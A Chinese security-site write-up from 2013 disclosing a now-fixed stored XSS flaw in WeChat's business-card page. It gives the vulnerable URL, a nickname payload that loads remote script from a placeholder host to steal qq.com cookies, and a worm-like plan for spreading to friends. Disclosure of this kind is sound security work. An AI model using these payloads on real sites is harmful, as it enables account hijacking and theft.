频道栏目
首页 > 安全 > 网站安全 > 正文

微信名片存储型XSS—可盗取并控制好友QQ(已修复)

2013-07-13 07:44:00           
收藏   我要投稿
查看用户微信名片

url:http://weixin.qq.com/cgi-bin/showcard?t=weixin_card&muin=你的QQ号码&fuin=你/你好友的QQ号码  #高版本QQ客户端访问会提示登录,低版本QQ访问可直接查看

也可以通过微信图标访问

1、正常的页面:

myweixin

将微信昵称修改为<script>alert(1)</script>

2、XSS页面:

weixin2

 3、构造攻击代码:

32字符数限制,通过自定义短网址+简化<script></script>代码实现;

如:<script/src=//xx.cn/i />

 

4、构造xss代码后:

weixin3

通过得到的cookies可控制用户qq.com域任何网站(如:邮箱、空间、账户等)

 

漏洞深入利用:

猜想1:

1、获取当前登录QQ号码

2、自动加构造xss页面的微信用户QQ好友

3、访问xss页面

4、获得控制权

猜想2:

1、获取当前登录QQ号码

2、自动加构造xss页面的微信用户QQ好友

3、访问xss页面

4、通过抓取微信客户端修改昵称url(web微信暂无修改昵称接口),修改用户昵称为xss代码

5、获取好友列表

6、构造访问url:http://weixin.qq.com/cgi-bin/showcard?t=weixin_card&muin=你的QQ号码&fuin=好友QQ号码

7、分享此url给指定好友/诱骗好友访问你的微信名片

8、获得控制权

相关TAG标签 名片 好友
上一篇:HTML5下的XSS测试代码
下一篇:Struts2 includeParams属性命令执行漏洞
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站